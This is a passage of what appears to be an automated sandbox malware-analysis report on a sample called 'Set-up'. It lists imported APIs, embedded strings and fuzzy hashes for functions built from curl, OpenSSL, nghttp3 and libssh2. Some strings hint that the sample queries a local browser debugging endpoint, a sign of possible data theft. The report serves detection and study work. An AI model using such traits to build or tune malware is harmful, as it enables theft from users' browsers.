                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy$memmove
                                      • String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
                                      • API String ID: 1283327689-1606465060
                                      • Opcode ID: 79591892702411978dbe0bd533fea896bf671085e173e581b25c58dfd7996028
                                      • Instruction ID: b319b37309069ee6200ead3b3a14d0cc4d42ba73945920a4dbacebd365b81b78
                                      • Opcode Fuzzy Hash: 79591892702411978dbe0bd533fea896bf671085e173e581b25c58dfd7996028
                                      • Instruction Fuzzy Hash: EFC1D2316443019FCB14DF18C8859AABBF5FF88300F548569F85A8B292E770FE85CB82
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00582AD7
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00582B3D
                                      • sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00582D30
                                      • WSAGetLastError.WS2_32 ref: 00582D3A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen$ErrorLastsendto
                                      • String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
                                      • API String ID: 3285375004-3063461439
                                      • Opcode ID: f877d334867b16e3f9d726d2d699ef034aab3e8b16b1c2ffc680c4ea4797a8e1
                                      • Instruction ID: 3283746f517f72f2ba6d93f3119965fc0ffb70a143039f61b37fce9ffb1907c4
                                      • Opcode Fuzzy Hash: f877d334867b16e3f9d726d2d699ef034aab3e8b16b1c2ffc680c4ea4797a8e1
                                      • Instruction Fuzzy Hash: 6DE1D675B00301ABD714AB14DC4AF6A7FD4BF91704F184969FC08AB3E2EAB2E854C791
                                      APIs
                                      • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00534749
                                      • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 005348E5
                                      • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0053491B
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534963
                                      • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00534971
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0053497B
                                        • Part of subcall function 005306F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00535663,?), ref: 005306F9
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534A41
                                      • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00534A63
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534A6D
                                      • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00534AE0
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534AEA
                                      • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00534B28
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534B34
                                      • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00534B76
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00534B80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _errno$strtoul$strchr$memchrstrlen
                                      • String ID: %ld$%u.%u.%u.%u$urlapi.c
                                      • API String ID: 102816355-2423153182
                                      • Opcode ID: 1fa33e33e5d80d7d089b9dcff694bae4b2bcee4c3e19876b146684e4a0f45b37
                                      • Instruction ID: 4809ac5442cc82d1788f9e94f0db71c756e8eb3cb7d6f979dab899d3e3b089c9
                                      • Opcode Fuzzy Hash: 1fa33e33e5d80d7d089b9dcff694bae4b2bcee4c3e19876b146684e4a0f45b37
                                      • Instruction Fuzzy Hash: 14D146B1908306ABEB106B24DC56B7F7FD9BF91344F094438F88597282F735AD548BA2
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0054090A
                                      • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00540979
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlenstrtoul
                                      • String ID: Attempt to get SFTP stats failed: %s$Syntax error: chgrp gid not a number$Syntax error: chmod permissions not a number$Syntax error: chown uid not a number$atime$chgrp$chmod$chown$date overflow$incorrect date format for %.*s$mtime$vssh/libssh2.c
                                      • API String ID: 4005410869-1121828786
                                      • Opcode ID: 48e328fd10143b8f9234257ce8319aec961fc0c63eeae457b287fe7ac80311a6
                                      • Instruction ID: 3039018e4d02eb3e1fc5cb748cf734a990136fe098abf2bcfb87498133240bba
                                      • Opcode Fuzzy Hash: 48e328fd10143b8f9234257ce8319aec961fc0c63eeae457b287fe7ac80311a6
                                      • Instruction Fuzzy Hash: CCB11870B44701AFE3119F24DC46B5ABFE6BF85718F044968FA486B3D2E771A914CB82
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 0058C37A
                                      • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 0058C476
                                      • WSAGetLastError.WS2_32 ref: 0058C4AE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ErrorLastmemcpystrcpy
                                      • String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
                                      • API String ID: 31095072-3036451936
                                      • Opcode ID: da01eb6d599e7ca00da5083e1e13898e52bb8d600c91855fc0315061e6d9237d
                                      • Instruction ID: deb3461d8b3d849de4e7d96e43aef2d0745916a968fa051bc1961d034d6d4c9d
                                      • Opcode Fuzzy Hash: da01eb6d599e7ca00da5083e1e13898e52bb8d600c91855fc0315061e6d9237d
                                      • Instruction Fuzzy Hash: FA511BB29083409BDB20BA54DC45B6FBFD4FFD1304F14886DFD84AB292E675D9848B62
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AUTH$CAPABILITY$Got unexpected imap-server response$L-IR$LOGINDISABLED$PREAUTH connection, already authenticated$SASL$STAR$STARTTLS$STARTTLS denied$STARTTLS not available.$TTLS
                                      • API String ID: 0-3171374047
                                      • Opcode ID: 337af62ee73647b20b7e7b9696c3cb815ebc5da2438bf7a4269d648b6a5a9877
                                      • Instruction ID: 31af2ddc19f7436755b73b8a45145245592649f6ef8045778f47e19eec2ea14a
                                      • Opcode Fuzzy Hash: 337af62ee73647b20b7e7b9696c3cb815ebc5da2438bf7a4269d648b6a5a9877
                                      • Instruction Fuzzy Hash: B8B17CB09043019BDB119B24E889B7A7FA4BF95714F14C56AE85D47382EB319E84F782
                                      APIs
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005120D4
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005122D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: freemalloc
                                      • String ID: +N$@$All %d attempts to fetch debugger URL failed.$Attempt %d failed: %s$Failed to allocate memory for response.$Failed to initialize curl.$GET request succeeded on attempt %d.$Q$d$http://localhost:%d/json
                                      • API String ID: 3061335427-1249806554
                                      • Opcode ID: 6ca27628dcfd5e7b819f92d25b76020a18737f35a5b74c27295bc1dce67e78ae
                                      • Instruction ID: e3befa2eca1d230fd2723ff3515708a84f39845142e7269333dc556107b27d37
                                      • Opcode Fuzzy Hash: 6ca27628dcfd5e7b819f92d25b76020a18737f35a5b74c27295bc1dce67e78ae
                                      • Instruction Fuzzy Hash: 656171B49087099FDB00EFA8D4897AEBFF0BF84314F118819E598A7341D7799984CF96
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 005B499C
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!conn->server,nghttp3_conn.c,00000A08), ref: 005B4A0A
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A2B,?), ref: 005B4A8E
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,00000A2C), ref: 005B4AA3
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(pri->inc == 0 || pri->inc == 1,nghttp3_conn.c,00000A2D), ref: 005B4AB8
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(conn->server,nghttp3_conn.c,00000A3E,?), ref: 005B4B1A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert$memcpy
                                      • String ID: !conn->server$conn->server$nghttp3_conn.c$pri->inc == 0 || pri->inc == 1$pri->urgency < NGHTTP3_URGENCY_LEVELS
                                      • API String ID: 3718630003-1169204258
                                      • Opcode ID: d1a895abe17ad6d3adca2c818b709f6d0a312da31e217520d25c4754bcd5d76a
                                      • Instruction ID: da9a3ac007c0384e4c2b71adf888ccec0bfbb2cac0ddef533b6375656d9e75b2
                                      • Opcode Fuzzy Hash: d1a895abe17ad6d3adca2c818b709f6d0a312da31e217520d25c4754bcd5d76a
                                      • Instruction Fuzzy Hash: 37512771A40705AFD7209E28DC45BEB7BEAFF8A354F044529F955821D2E770F980CBA2
                                      APIs
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00588C0E,?), ref: 006C45E3
                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dynamic,?,?,00588C0E,?), ref: 006C460A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strcmp
                                      • String ID: /data/curl-i686/lib/engines-3$DIR_ADD$DIR_LOAD$ENGINE_by_id$LIST_ADD$LOAD$OPENSSL_ENGINES$crypto/engine/eng_list.c$dynamic$id=%s
                                      • API String ID: 1004003707-1524119518
                                      • Opcode ID: de4a18e0f306149fd3f0a67a8fca649639da40b6ba5a4d2f449d6503e9fe56a3
                                      • Instruction ID: 11f8d6940660173aba54a76480a394aab87893ed18cd76a9efd37661be82e706
                                      • Opcode Fuzzy Hash: de4a18e0f306149fd3f0a67a8fca649639da40b6ba5a4d2f449d6503e9fe56a3
                                      • Instruction Fuzzy Hash: DE41F275B817106AE670B2642D67FBA319ACB12B44F09006CFE04A63D3FF99D91081BB
                                      APIs
                                      • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000005D), ref: 00576884
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 005768AC
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 005768C1
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00576973
                                      • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F), ref: 00576983
                                      • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001), ref: 00576995
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpystrchr$atoistrlen
                                      • String ID: [
                                      • API String ID: 444251876-784033777
                                      • Opcode ID: c2ab50610cc51b6fd7448d6e2694522c61d19a1f8d2f8fed155cc04ee1c59147
                                      • Instruction ID: 0a2c3a84ef9c3789c575313a2e47d31461a6cbab905283c82755fcbe0c3cf777
                                      • Opcode Fuzzy Hash: c2ab50610cc51b6fd7448d6e2694522c61d19a1f8d2f8fed155cc04ee1c59147
                                      • Instruction Fuzzy Hash: 8AB16971508B925BDB3A9A25B89073A7FD8FB56304F18C92DE8CDC6181EB25CC44B753
                                      APIs
                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk.,0000006F,00000001,?), ref: 00516467
                                      Strings
                                      • mite, xrefs: 00516688
                                      • %d%02d%02d %02d:%02d:%02d, xrefs: 005166D5
                                      • %s%s "%d%02d%02d %02d:%02d:%02d", xrefs: 00516540
                                      • hsts.c, xrefs: 0051656B, 005165CF
                                      • %s%s "%s", xrefs: 005164AA
                                      • unlimited, xrefs: 005164A1
                                      • # Your HSTS cache. https://curl.se/docs/hsts.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00516462
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
